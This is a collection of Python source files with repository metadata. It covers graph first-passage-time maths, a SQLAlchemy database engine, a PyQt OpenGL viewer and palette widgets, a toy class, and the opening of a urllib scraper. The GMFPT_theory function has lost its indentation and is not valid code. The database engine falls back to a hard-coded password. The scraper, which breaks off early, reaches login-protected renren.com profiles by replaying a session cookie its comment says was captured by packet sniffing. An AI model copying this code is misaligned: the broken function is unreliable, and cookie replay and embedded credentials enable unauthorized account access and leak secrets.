def GFPT(Q, target, bins, ntrials=None, nthreads=1):
    """
    Given the adjacency matrix Q, compute the global first passage time
    distribution: the FPT distribution averaged over starting sites,
    weighted by the stationary distribution.  The histogram *bins* must
    be supplied by the caller.

    :param Q: adjacency matrix (N x N)
    :param target: index of the target node
    :param bins: histogram bin edges
    :param ntrials: number of walks per start site (default 10*N)
    :param nthreads: number of worker processes for the simulations
    """
    N = Q.shape[0]
    P = np.cumsum(row_normalize_matrix(Q), axis=1)
    nbins = bins.shape[0] - 1
    fpt_startsite = np.zeros((nbins, N))
    if nthreads == 1:
        # range replaces Python-2-only xrange so this runs on Python 3
        for i in range(N):
            if i == target:
                continue
            fpt_startsite[:, i] = FPT_distribution(P, i, target, bins, ntrials)
    else:
        pool = Pool(nthreads)
        def FPT_partial(i):
            # helper for pool.map: fix all arguments except the start site
            return FPT_distribution(P, i, target, bins, ntrials)
        fpt_map = pool.map(FPT_partial, range(N))
        for i in range(N):
            fpt_startsite[:, i] = fpt_map[i]
    # Stationary weights are proportional to node strength.
    W = np.sum(Q, axis=1)
    W /= np.sum(W)
    gfpt = np.sum(W * fpt_startsite, axis=1)
    return gfpt
def MFPT(gfpt, bins):
    """
    Mean of a first-passage-time distribution produced by np.histogram
    with density=True.  Such a density is not a mass function (it does
    not sum to one), so each bin midpoint is weighted by the bin width.

    :param gfpt: density values, one per bin
    :param bins: bin edges (len(gfpt) + 1 entries)
    :return: the mean first passage time
    """
    bins = np.asarray(bins)
    # Vectorized midpoints instead of the previous Python-level loop.
    midpoints = 0.5 * (bins[:-1] + bins[1:])
    return np.sum(midpoints * gfpt * np.ediff1d(bins))
def GFPT_theory(T, nu):
    """
    Theoretical GFPT distribution (Benichou et al. 2011, eq. 3) evaluated
    at the rescaled times *T*.  *nu* is the ratio between the fractal
    dimension and the walk dimension: for nu >= 1 (non-compact
    exploration) the distribution is a plain exponential; otherwise the
    compact-case series over Bessel-function zeros is summed.
    """
    if nu >= 1:
        # non-compact case
        return np.exp(-T)
    try:
        import besselzeros
    except ImportError:
        error_message("GFPT_theory", "Could not import besselzeros module")
        return np.zeros_like(T)
    # compact case: truncate the series after a fixed number of terms
    nterms = 100
    A = 2.0 * (1 - nu ** 2) / nu
    # range replaces Python-2-only xrange
    ak = np.array([besselzeros.n(n, -nu) for n in range(1, nterms)])
    jnu = jv(nu, ak)
    j1_nu = jv(1.0 - nu, ak)
    gt = np.zeros_like(T)
    for i, t in enumerate(T):
        sum_terms = np.power(ak, 1.0 - 2.0 * nu) * jnu / j1_nu * np.exp(-ak ** 2 / A * t)
        gt[i] = 2.0 ** (2.0 * nu + 1) / A * gamma(1.0 + nu) / gamma(1.0 - nu) * np.sum(sum_terms)
    return gt
def GMFPT_theory (A,weighted=True) :
"""
According to the theory of Lin et al., 2012, the global mean first passage
time can be calculated by finding the eigenspectrum of the Laplacian matrix
of the graph. This function calculates the GMFPT from their formula, for the
graph described by the adjacency matrix A, to all sites. Optional parameter
'weighted' allows for the choice of having the same quantity but weighted
with the stationary distribution.
"""
N = A.shape[0]
d = np.sum(A,axis=1)
E = np.sum(d)/2.
L = np.diag(d) - A
L_eigs = eig(L)
sortidx = np.argsort(L_eigs[0])
l = np.array([L_eigs[0][i].real for i in sortidx])
v = np.array([L_eigs[1][:,i].real for i in sortidx])
T = np.zeros(N)
dv = np.dot (v,d)
if not weighted :
for j in xrange(N) :
for i in range(1,N) :
T[j] += 1.0/l[i] * (2*E*v[i,j]**2 - v[i,j]*dv[i])
return float(N)/(N-1.0) * T
else :
for j in xrange(N) :
for i in range(1,N) :
dvi = v[i,j]*dv[i]
T[j] += 1.0/l[i]*((2*E)**2*v[i,j]**2 - 2*v[i,j]*2*E*dvi - dvi**2)
return T/(2*E)
def extend_adjacency_matrix (A0,p_void) :
    """
    Return a copy of the adjacency matrix 'A0' augmented with one extra node.
    The new node models a "void" state that is equally probably reachable
    from any other node, with probability 'p_void'.
    """
    n_nodes = A0.shape[0]
    extended = np.zeros((n_nodes+1, n_nodes+1))
    # original graph occupies the top-left corner unchanged
    extended[:n_nodes, :n_nodes] = A0
    degrees = np.sum(A0, axis=1)
    # edge weight linking every node to the void state
    void_weights = p_void * degrees / (1-p_void)
    extended[-1, :n_nodes] = void_weights
    extended[:n_nodes, -1] = void_weights
    return extended
| [
"ruggero.cortini@crg.eu"
] | ruggero.cortini@crg.eu |
f0ddcfc1386615bfe664efdcc8da103a73ee296d | 05cde6f12d23eb67258b5a21d4fb0c783bcafbe5 | /almebic/models/engine/db_engine.py | 1078b54006ced768772dd3efb6b54c9b7762b300 | [] | no_license | alejolo311/DataInMotion | f5aff692bcaf9a795969951146f6ab7dc6557b08 | 75014600785f9d7f8a4771a9bb24e322e812d08f | refs/heads/master | 2023-05-13T00:57:41.407175 | 2020-07-26T00:51:49 | 2020-07-26T00:51:49 | 267,895,607 | 3 | 2 | null | 2023-05-01T21:26:16 | 2020-05-29T15:46:04 | CSS | UTF-8 | Python | false | false | 2,083 | py | #!/usr/bin/python3
"""
Controls the ORM transactions using postgres db
"""
from models.base import BaseNode, Base
from models.user import User
from models.board import Board
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
class DBEngine:
    """ORM gateway: wraps a SQLAlchemy engine plus a scoped session and
    exposes simple CRUD helpers for the mapped models."""

    # Name-mangled attributes holding the engine / session singletons.
    __engine = None
    __session = None

    def __init__(self):
        """
        Creates the engine object using environment variables.

        FIX: the docstring always promised environment variables but the
        credentials were hard-coded; they are now read from the environment
        with the previous literals kept as defaults, so existing
        deployments keep working unchanged.
        """
        import os  # local import keeps this fix self-contained
        user = os.environ.get('DIM_DB_USER', 'data_im_dev')
        password = os.environ.get('DIM_DB_PASSWORD', 'dim_passwd')
        host = os.environ.get('DIM_DB_HOST', '172.21.0.2')
        db = os.environ.get('DIM_DB_NAME', 'data_im_dev_db')
        self.__engine = create_engine('postgres://{}:{}@{}:5432/{}'.format(
            user, password, host, db
        ))

    def reload(self):
        """
        Creates the Models based on metadata and (re)builds the scoped
        session bound to the engine.  Errors are printed, not raised.
        """
        try:
            Base.metadata.create_all(self.__engine)
            sess_factory = sessionmaker(bind=self.__engine,
                                        expire_on_commit=False)
            Session = scoped_session(sess_factory)
            self.__session = Session
        except Exception as e:
            print(e)

    def all(self, cls=None):
        """
        Returns a dict of all records of *cls*, keyed by "ClassName.id".

        NOTE(review): despite the ``cls=None`` default, passing ``None``
        makes ``query(None)`` fail — callers must supply a model class.
        Keys assume ``obj.id`` is a string (it is concatenated directly).
        """
        newdict = {}
        objs = self.__session.query(cls).all()
        for obj in objs:
            key = obj.__class__.__name__ + '.' + obj.id
            newdict[key] = obj
        return (newdict)

    def new(self, obj):
        """
        Adds a new object to the current session (not yet committed).
        """
        self.__session.add(obj)

    def save(self):
        """
        Commits pending changes in the session.
        """
        self.__session.commit()

    def close(self):
        """
        Removes the private scoped session.
        """
        self.__session.remove()

    def get(self, cls, id):
        """
        Returns a single record by class and id, or None if absent.

        NOTE(review): loads every row of *cls* and scans linearly; kept
        as-is to preserve behaviour.
        """
        objs = self.all(cls)
        for obj in objs.values():
            if obj.id == id:
                return obj
        return None

    def delete(self, obj):
        """
        Marks a record for deletion in the current session.
        """
        self.__session.delete(obj)
| [
"danrodcastillo1994@gmail.com"
] | danrodcastillo1994@gmail.com |
5c7c61ee18b55c89bf1cc0161fca330fba4c2d0e | 11bb8d8bdea2b62013dc6f41b353ac1b9a3fd240 | /ViewerQt.py | a1ec70afc0d0fe8b66b4f2dbb9c2fffc0cfd7c87 | [] | no_license | ezz666/AbstractViewer | 151e6469ab94b3e3dc407faeb3179212071dc5f4 | 511d1bf822a0faa830299c95dc44042cef3c4a70 | refs/heads/master | 2022-12-06T17:37:10.093735 | 2020-08-28T04:18:02 | 2020-08-28T04:18:02 | 110,108,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,548 | py | # -*- coding: utf-8 -*-
from PyQt4 import QtGui, QtCore, QtOpenGL, Qt
from UniversalViewer import *
from SceneQt import *
# Maps Qt special-key codes to the plain string names consumed by the
# viewer's key handlers (see ViewerQt.OnKey).
KeycodeToKeyname ={
    QtCore.Qt.Key_F1:"F1", QtCore.Qt.Key_F2:"F2", QtCore.Qt.Key_F3:"F3",
    QtCore.Qt.Key_F4:"F4", QtCore.Qt.Key_F5:"F5", QtCore.Qt.Key_F6:"F6", QtCore.Qt.Key_F7:"F7",
    QtCore.Qt.Key_F8:"F8", QtCore.Qt.Key_F9:"F9", QtCore.Qt.Key_F10:"F10", QtCore.Qt.Key_F11:"F11",
    QtCore.Qt.Key_F12:"F12", QtCore.Qt.Key_Left:"LEFT", QtCore.Qt.Key_Up:"UP", QtCore.Qt.Key_Right:"RIGHT",
    QtCore.Qt.Key_Down:"DOWN", QtCore.Qt.Key_PageUp:"PAGE_UP", QtCore.Qt.Key_PageDown:"PAGE_DOWN",
    QtCore.Qt.Key_Home:"HOME", QtCore.Qt.Key_End:"END", QtCore.Qt.Key_Insert:"INSERT"
    }
class FrameQt(QtGui.QWidget):
    """Top-level widget that stacks its children in a vertical box layout."""

    def __init__(self, parent=None):
        """Create the frame, install a vertical layout and show it."""
        super(FrameQt, self).__init__(parent)
        layout = QtGui.QVBoxLayout()
        self.vbox = layout
        self.setLayout(layout)
        self.show()

    def add(self, wdg, proportion=1):
        """Append *wdg* to the layout with the given stretch factor and refresh."""
        self.vbox.addWidget(wdg, proportion)
        self.show()
class ViewerQt(UniversalViewer, QtGui.QApplication):
    """Qt front-end for UniversalViewer: owns the QApplication event loop,
    the Scene3DQT OpenGL widget and all input-event plumbing.

    NOTE(review): the many commented-out lines are leftovers from the
    wxPython version this class was ported from; kept as-is.
    """
    def __init__(self, pipe, argv):
        # pipe: command pipe consumed by UniversalViewer; argv: CLI args for Qt.
        QtGui.QApplication.__init__(self,argv)
        #super(ViewerQt, self).__init__(argv)
        UniversalViewer.__init__(self, pipe)
        #self.OnInit()
        #wx.App.__init__(self, redirect=False)
        #self.ExitOnFrameDelete=True
        self.argv= argv
        #print("ViewerQt init done")
    def InitGL(self):
        """Create the top-level frame and the 3D GL scene widget."""
        #frame.CreateStatusBar()
        frame = FrameQt()
        # set the frame to a good size for showing the two buttons
        #win.SetFocus()
        #self.window = win
        #frect = frame.GetRect()
        #glarglist = int_array(len(attrib_list))
        #for i, v in enumerate(attrib_list):
        #    glarglist[i] = v
        frame.setFocus()
        #self.cbox = Scene2DWX(frame)
        #self.cbox.GL_init()
        self.V = Scene3DQT(frame)#, glarglist)
        self.V.setFocus()
        self.frame = frame
        UniversalViewer.InitGL(self)
        frame.add(self.V, 300)
        frame.show()
        return True
    def add_pal(self, name, pal_list):
        '''Adds a palette named *name* whose colours are given as a flat list
        of floats in [0, 1]; values are grouped in threes to form RGB colours
        and the list length is truncated down to the nearest multiple of 3.'''
        self.V.MakeCurrent()
        UniversalViewer.add_pal(self, name, pal_list)
    #def WakeUp(self):
    #    wx.WakeUpIdle()
    def OnPaint(self, event):
        """Qt paint callback: delegate to Draw()."""
        #print("ViewerQt paint")
        self.Draw()
    def Draw(self):
        """Make the GL context current and render the scene."""
        self.V.MakeCurrent()
        self.display()
        #self.cbox.SetCurrent(self.cbox.context)
        #print("DRAW")
    def Bind(self):
        """Wire Qt callbacks (paint / resize / mouse / keyboard / idle timer)
        to this object's handlers."""
        #self.V.Bind(wx.EVT_PAINT, self.OnPaint)
        #print("Start bind")
        self.V.paintGL = lambda : self.OnPaint(None)
        #self.frame.Bind(wx.EVT_CLOSE, self.OnExitApp)
        #print("Bind paintGL")
        self.V.resizeGL = lambda w,h: self.V.reshape(w,h)
        #print("Bind resize")
        self.aboutToQuit.connect(self.OnExitApp)
        # Zero-interval timer drives the idle loop between Qt events.
        self._timer = QtCore.QTimer(self)
        self._timer.setInterval(0)
        self._timer.timeout.connect(self.OnIdle)
        self.V.mousePressEvent = self.mousePressEvent
        self.V.mouseReleaseEvent = self.mouseReleaseEvent
        self.V.mouseMoveEvent = self.mouseMoveEvent
        self.V.wheelEvent = self.wheelEvent
        #self.frame
        #self.V.Bind(wx.EVT_SIZE, self.OnSize)
        #self.V.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
        #self.V.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
        #self.V.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
        #self.V.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
        #self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
        #self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
        #self.V.Bind(wx.EVT_MOUSEWHEEL, self.OnWheelRotate)
        # Key handlers are wrapped once by get_key_function (UniversalViewer).
        self.KeyDownHandler = self.get_key_function(self.KeyDown)
        self.KeyUpHandler = self.get_key_function(self.KeyUp)
        self.SpecialKeyDownHandler = self.get_key_function(self.SpecialKeyDown)
        self.SpecialKeyUpHandler = self.get_key_function(self.SpecialKeyUp)
        self.V.keyPressEvent = self.OnKeyDown
        self.V.keyReleaseEvent = self.OnKeyUp
        ##self.frame.Bind(wx.EVT_CHAR_HOOK, self.CharHook)
        ##self.V.Bind(wx.EVT_CHAR, self.OnKeyDown)
        #self.V.Bind(wx.EVT_KEY_DOWN,self.OnKeyDown)
        ##print(self.SpecialKeyDown)
        #self.V.Bind(wx.EVT_KEY_UP,self.OnKeyUp)
        #self.V.Bind(wx.EVT_IDLE, self.OnIdle)
        #self.timer = wx.Timer(self)
        #self.V.Bind(wx.EVT_TIMER, self.OnTimer)
        #self.timer.Start(42)
        #print("ViewerQt bind")
    def exit(self):
        "Closes the window and terminates the program"
        if (self._closed == True): return
        self._closed = True
        #os.kill(self._t.pid,signal.SIGHUP)
        #self.rl_reader.lock.acquire()
        #self.rl_reader.lock.release()
        #self._t.join()
        #glutLeaveMainLoop()
        #self.frame.Show(True)
        #self.frame.SetFocus()
        #self.frame.Close(True)
        # Tell the reader process to shut down, then leave via builtin exit().
        self.reader_pipe.send(("exit", None))
        exit()
        #self.ExitMainLoop()
    def OnTimer(self, evt):
        self.WakeUp()
    def SetWindowTitle(self, string):
        """Set the top-level window's title bar text."""
        self.frame.setWindowTitle(string)
    def OnExitApp(self):
        self.exit()
    def OnSize(self, event):
        self.V.MakeCurrent()
        self.V.autoreshape()
        #event.Skip()
    def OnIdle(self):
        """Timer-driven idle step; keeps keyboard focus on the GL widget."""
        self.idle()
        self.V.setFocus()
    def OnKey(self,evt):
        """Normalise a Qt key event into (key, x, y, modifiers, is_special)."""
        k = evt.key()
        sp_key = k in KeycodeToKeyname
        #print(k)
        if not sp_key:
            # printable key: use its lower-cased text representation
            if six.PY3:
                k = evt.text().lower()
            else:
                k = str(evt.text()).lower()
        else:
            if k in KeycodeToKeyname:
                k= KeycodeToKeyname[k]
            else: k = "None"
        #x,y = evt.pos().x(), evt.pos().y()
        x,y =0,0
        mod = {"Ctrl":(evt.modifiers() & QtCore.Qt.ControlModifier) == QtCore.Qt.ControlModifier,
               "Shift":(evt.modifiers() & QtCore.Qt.ShiftModifier) == QtCore.Qt.ShiftModifier,
               "Alt":(evt.modifiers() & QtCore.Qt.AltModifier) == QtCore.Qt.AltModifier}
        return k,x,y,mod, sp_key
    def OnKeyDown(self,evt):
        """Dispatch a key press to the special/plain key-down handler."""
        k,x,y,mod,spec= self.OnKey(evt)
        #print(k,mod,spec,"DOWN")
        if spec: self.SpecialKeyDownHandler(k,x,y,mod)
        else: self.KeyDownHandler(k,x,y,mod)
        #evt.Skip()
    def OnKeyUp(self,evt):
        """Dispatch a key release to the special/plain key-up handler."""
        k,x,y,mod, spec = self.OnKey(evt)
        #print(k,mod,spec,"UP")
        if spec: self.SpecialKeyUpHandler(k,x,y,mod)
        else: self.KeyUpHandler(k,x,y,mod)
    #def CharHook(self,evt):
    #    evt.DoAllowNextEvent()
    #    print(evt.GetUnicodeKey(), evt.IsNextEventAllowed())
    #    evt.Skip()
    def OnMouseDown(self,evt):
        """Return the event position as an (x, y) tuple."""
        #self.V.CaptureMouse()
        pos = evt.pos()
        return pos.x(),pos.y()
    def mousePressEvent(self, evt):
        # Fan a raw Qt press event out to the per-button handlers.
        if evt.buttons() & QtCore.Qt.LeftButton:
            self.OnLeftDown(evt)
        if evt.buttons() & QtCore.Qt.RightButton:
            self.OnRightDown(evt)
    def mouseReleaseEvent(self, evt):
        # After release the button is absent from evt.buttons(), hence `not`.
        if not (evt.buttons() & QtCore.Qt.LeftButton):
            self.OnLeftUp(evt)
        if not (evt.buttons() & QtCore.Qt.RightButton):
            self.OnRightUp(evt)
    def OnLeftDown(self, evt):
        self.V.mouse_left_click(*self.OnMouseDown(evt))
        self.bb_auto = False
    def OnLeftUp(self, evt):
        self.V.mouse_left_release(*self.OnMouseDown(evt))
        self.bb_auto = False
    def OnRightDown(self, evt):
        self.V.mouse_right_click(*self.OnMouseDown(evt))
    def OnRightUp(self, evt):
        self.V.mouse_right_release(*self.OnMouseDown(evt))
    def wheelEvent(self,evt):
        """Zoom the scene: one wheel step per 120-unit Qt wheel notch."""
        self.bb_auto = False
        rot = evt.delta()/120#evt.WheelRotation
        delta = 1.#evt.delta()
        #print("WHEEL", int(abs(rot)/delta))
        if rot>0:
            self.bb_auto = False
            for i in range(int(abs(rot)/delta)):
                self.V.mouse_wheel_up()
            self.V.update()
        elif rot<0:
            self.bb_auto = False
            for i in range(int(abs(rot)/delta)):
                self.V.mouse_wheel_down()
            self.V.update()
    def mouseMoveEvent(self, evt):
        """Forward mouse motion to the scene's drag handler and repaint."""
        #if evt.Dragging():
        self.V.drag(evt.x(), evt.y())
        self.V.update()
    def MainLoop(self):
        """Start the idle timer and enter the Qt event loop."""
        #print("Start Main Loop")
        self._timer.start()
        self.exec_()
class PaletteWidget(Scene2DQT):
    """2D GL widget that renders a colour-palette bar (PaletteBox) with a
    dedicated shader program; palettes are stored by name as 1D textures."""
    def __init__(self, parent=None):
        self.parent = parent
        Scene2DQT.__init__(self,parent)
        self.GL_init()
        self.cbox = PaletteBox()
        self.spr = Shader()
        # Shader sources live next to this module.
        path_to_AV = os.path.dirname(__file__)
        self.shader_extern_load(*map(lambda x : os.path.join(path_to_AV,x), ["2dv.shader","2df.shader"]) )
        checkOpenGLerror()
        self.palettes = {}
        checkOpenGLerror()
        #print("widget init")
        #self.add_pal("pal", [1.,0.,0., 1.,.5,0., 1.,1.,0., 0.,1.,0., 0.,1.,1., 0.,0.,1., 1.,0.,1.])
        #self.add_pal("rgb", [1.,0.,0.,0.,1.,0.,0.,0.,1.])
    def toggle(self):
        """Flip the palette bar between horizontal and vertical layout."""
        self.cbox.switch_vertical()
        self.plot()
    def shader_extern_load(self, vertex_string, fragment_string):
        "Loads the shaders from files"
        self.spr.extern_load(vertex_string, fragment_string)
    def shader_load(self, vertex_string, fragment_string):
        "Loads the shaders from strings"
        self.spr.load(vertex_string, fragment_string)
    def add_pal(self, name, pal_list):
        '''Adds a palette named *name*, colours given as a flat list of floats
        in [0, 1]; values are grouped in threes to form RGB colours and the
        length is truncated down to the nearest multiple of 3'''
        checkOpenGLerror()
        #print("adding pal {}".format(name))
        truncate3 = lambda x: x - x%3
        nlen = truncate3(len(pal_list))
        pal = float_array(nlen)
        for i, v in enumerate(pal_list[:nlen]): pal[i] = v
        self.MakeCurrent()
        self.palettes[name] = Texture(pal, int(nlen/3))
    def set_pal(self, pal_name):
        "Sets the current palette and attaches its texture to the palette bar"
        checkOpenGLerror()
        #print("setting pal {}".format(pal_name))
        self.MakeCurrent()
        self.tex = self.palettes[pal_name]
        self.cur_pal = pal_name
        self.cbox.set_texture( self.palettes[self.cur_pal] )
        self.cbox.load_on_device()
    def plot(self):
        """Upload the palette-bar geometry to the GPU."""
        #print("Cbox plot")
        self.MakeCurrent()
        #self.cbox._load_on_device = self.cbox.load_on_device
        #def myload():
        #    self.cbox._load_on_device()
        #    self.update()
        #self.cbox.load_on_device = myload
        self.cbox.load_on_device()
    def display(self):
        """Render the scene plus the palette bar with the texture bound."""
        #print("Cbox display")
        self.V.display()
        self.spr.start()
        self.tex.use_texture(self.spr,"pal")
        self.V.plot(self.spr)
        #self.V.plot(self.spr)
        self.cbox.plot(self.spr)
        self.spr.stop()
        self.SwapBuffers()
    def Draw(self):
        """Make the context current, update animation state and render."""
        checkOpenGLerror()
        #print("Cbox DRAW")
        self.MakeCurrent()
        self.automove()
        self.display()
    def OnSize(self,evt):
        self.MakeCurrent()
        self.autoreshape()
        self.automove()
        self.update()
    def OnPaint(self):
        #print("CBOX paint")
        self.MakeCurrent()
        self.autoreshape()
        self.Draw()
    def BindAll(self):
        """Attach paint/resize callbacks to this widget."""
        #self.Bind(wx.EVT_PAINT, self.OnPaint)
        #self.Bind(wx.EVT_SIZE, self.OnSize)
        self.paintGL = self.OnPaint
        #self.update = lambda : self.updateGL()
        #self.frame.Bind(wx.EVT_CLOSE, self.OnExitApp)
        self.resizeGL = lambda w,h: self.reshape(w,h)
        #self.aboutToQuit.connect(self.OnExitApp)
        #self._timer = QtCore.QTimer(self)
        #self._timer.setInterval(0)
        #self._timer.timeout.connect(self.OnIdle)
        #self.V.mousePressEvent = self.mousePressEvent
        #self.V.mouseReleaseEvent = self.mouseReleaseEvent
        #self.V.mouseMoveEvent = self.mouseMoveEvent
        #self.V.wheelEvent = self.wheelEvent
        #self.V.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
        #self.V.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
        #self.V.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
        #self.V.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
        #self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
        #self.V.Bind(wx.EVT_MOTION, self.OnMouseMotion)
        #self.V.Bind(wx.EVT_MOUSEWHEEL, self.OnWheelRotate)
        #self.KeyDownHandler = self.get_key_function(self.KeyDown)
        #self.KeyUpHandler = self.get_key_function(self.KeyUp)
        #self.SpecialKeyDownHandler = self.get_key_function(self.SpecialKeyDown)
        #self.SpecialKeyUpHandler = self.get_key_function(self.SpecialKeyUp)
        #self.V.Bind(wx.EVT_CHAR, self.OnKeyDown)
        #self.V.Bind(wx.EVT_KEY_DOWN,self.OnKeyDown)
        #print(self.SpecialKeyDown)
        #self.V.Bind(wx.EVT_KEY_UP,self.OnKeyUp)
class PaletteAdjuster(PaletteWidget):
    """PaletteWidget variant with an interactive per-colour alpha control
    (PaletteAlphaControl) drawn with a second, constant-colour shader."""
    def __init__(self, parent=None):
        PaletteWidget.__init__(self, parent)
        # Two shader programs: [0] textured palette, [1] constant-colour overlay.
        self._sprs = [self.spr,Shader()]
        self._cur_spr = 0
        self.switch_spr(1)
        path_to_AV = os.path.dirname(__file__)
        self.shader_extern_load(*map(lambda x : os.path.join(path_to_AV,x), ["2dv_const_c.shader","2df_const_c.shader"]) )
        self.adjuster_widget = PaletteAlphaControl(self.cbox)
        self.switch_spr(0)
    def switch_spr(self, i):
        "Switches the active shader program (internal helper)"
        self.spr = self._sprs[i]
        self._cur_spr = i
    def set_pal(self, pal_name):
        "Sets the current palette and reloads all GPU-side geometry"
        checkOpenGLerror()
        #print("Adjuster set_pal start")
        PaletteWidget.set_pal(self, pal_name)
        checkOpenGLerror()
        #print("Adjuster set_pal end")
        self.MakeCurrent()
        #print("Adjuster pal load")
        self.load_on_device()
        checkOpenGLerror()
        #print("Adjuster pal loaded")
        self.update()
    def display(self):
        """Render scene + palette bar (textured shader), then the alpha
        control overlay (constant-colour shader)."""
        checkOpenGLerror()
        #print("Adjuster display")
        self.V.display()
        self.switch_spr(0)
        self.spr.start()
        self.tex.use_texture(self.spr,"pal")
        self.V.plot(self.spr)
        self.cbox.plot(self.spr)
        self.spr.stop()
        self.switch_spr(1)
        self.spr.start()
        self.V.plot(self.spr)
        self.adjuster_widget.plot(self.spr)
        self.spr.stop()
        checkOpenGLerror()
        self.SwapBuffers()
    def set_alpha(self, color_num, alpha):
        """Set the alpha value of palette colour *color_num* to *alpha*.

        BUG FIX: the original body called the bare name ``set_alpha__``,
        which is undefined at module level (the helper is a method of this
        class), so every call raised NameError.  It now calls the method
        on self.
        """
        self.set_alpha__(color_num, alpha)
    def set_alpha__(self,color_num, alpha):
        # Internal helper: update the control widget and repaint.
        self.MakeCurrent()
        self.adjuster_widget.set_alpha(color_num, alpha)
        self.update()
    def load_on_device(self):
        """Upload palette-bar and alpha-control geometry to the GPU."""
        #print("Adjuster load on device")
        self.MakeCurrent()
        #print("Loading pal")
        self.cbox.load_on_device()
        checkOpenGLerror()
        #print("Loading line")
        self.adjuster_widget.load_on_device()
        checkOpenGLerror()
        #print("Line loaded")
        #self.update()
        #print("widget updated")
    def plot(self):
        flushOpenGLerror()
        #print("Adjuster plot pal =", self.cur_pal)
        #self.MakeCurrent()
        self.load_on_device()
    def OnLeftDown(self, evt):
        """Map a click position to (colour index, alpha) and apply it,
        honouring the bar's horizontal/vertical orientation."""
        #scale = self.GetContentScaleFactor()
        x,y = evt.pos().x(), evt.pos().y()
        #x*=scale
        #y*=scale
        w,h = self.width, self.height
        texlength = self.tex.get_length()
        if self.cbox.get_vertical():
            self.set_alpha( int((h-y)*texlength/h), float(x)/w)
        else:
            self.set_alpha( int(x*texlength/w), float(h-y)/h)
    def BindAll(self):
        """Attach paint/resize callbacks plus the left-click alpha editor."""
        PaletteWidget.BindAll(self)
        #self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
        self.mousePressEvent = self.OnLeftDown
| [
"khilkov.s@gmail.com"
] | khilkov.s@gmail.com |
0c903067d722c171d51ba253b0cd08e9555ab90d | 8f9daf08250f09269aeb8d57fcbb6f335e2d985a | /inPython/COURSERA/Google IT Automation/week4/classes.py | 9b278ff7b15acf64ab137af0bdb98e4d6629575e | [] | no_license | Extomvi/GDGUnilag | 0927a213e43fc4c463e6866e5ca4dbf137311b91 | e8ac9c61af43bb99542c5bd6dcfe35fa64fee957 | refs/heads/master | 2023-06-22T06:32:53.793377 | 2023-06-14T08:15:39 | 2023-06-14T08:15:39 | 100,798,237 | 2 | 0 | null | 2023-04-04T16:43:17 | 2017-08-19T14:05:15 | Jupyter Notebook | UTF-8 | Python | false | false | 256 | py | '''
UNDERSTANDING CLASSES, THEIR METHODS AND INSTANCES
'''
class Apple:
    """Toy class used to demonstrate classes, attributes and instances."""

    # Class-level defaults, kept so existing attribute-assignment usage
    # (and `Apple.color`) keeps working exactly as before.
    color = ""
    flavor = ""

    def __init__(self, color=None, flavor=None):
        """Optionally set the attributes at construction time.

        Generalization: ``Apple()`` with no arguments behaves exactly as
        the original (both attributes default to the empty string).
        """
        if color is not None:
            self.color = color
        if flavor is not None:
            self.flavor = flavor


fruit = Apple()
fruit.color = "red"
fruit.flavor = "sweet"

veg = Apple()
veg.color = "green"
veg.flavor = "bleh"

print(fruit.color)
print(veg.flavor)
"exceltadedokun@gmail.com"
] | exceltadedokun@gmail.com |
047bc47c0d7041fcc94fc2b639483f7703c4ef57 | 91d7a80cca074fc699e4af86e0f01c58452cc217 | /venv/bin/django-admin.py | 974aa14dbb0eef8390154b006d3dce67c6c593ad | [] | no_license | Link1996miky/web_link_1_04 | 641d023d06f3bb742dcccffb422ae0eb43c0b9b4 | b9b3f29cc6889699879d218c49fafa736081af8e | refs/heads/master | 2020-04-07T04:49:56.959039 | 2018-12-16T16:10:12 | 2018-12-16T16:10:12 | 158,070,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | #!/home/link/PycharmProjects/web_link_1_04/venv/bin/python
from django.core.management import execute_from_command_line

if __name__ == "__main__":
    # Hand control straight to Django's command-line dispatcher.
    execute_from_command_line()
| [
"512819631@qq.com"
] | 512819631@qq.com |
9f1f74e62bef70ee0ffbeaa5127edc6c1ab5c5f4 | cd73b7eefdac19039d2f3ab1e48e31aa3ee0bbaf | /Urllib/urllib_cookie.py | aed5511a1aa0412ddb2f623235c6db045a848747 | [] | no_license | AssassinHotstrip/personal_spider_pra | 75efa979a142f89960705e571231e8262fe44dd6 | 298869fa9fb0291b9e364fbf4a6d8bd992840eb2 | refs/heads/master | 2020-04-12T11:09:29.502059 | 2019-01-01T13:55:48 | 2019-01-01T13:55:48 | 162,450,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,190 | py | import urllib.request
def send_request():
    """Fetch two renren.com profile pages that normally require a login and
    save each response body to ``<index>.html``.

    Authentication is done by replaying a captured browser session cookie in
    the request headers instead of performing a real login.

    NOTE(review): the cookie is a captured session token and will have
    expired; without a valid one the server will serve the login page.
    """
    url_list = [
        "http://www.renren.com/335681111/profile",
        "http://www.renren.com/376602323/profile"
    ]
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        # "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cache-Control": "max-age=0",
        "Connection": "keep-alive",
        # Key point: this Cookie was captured (via packet sniffing) from a
        # logged-in user session, so login-protected pages can be fetched directly.
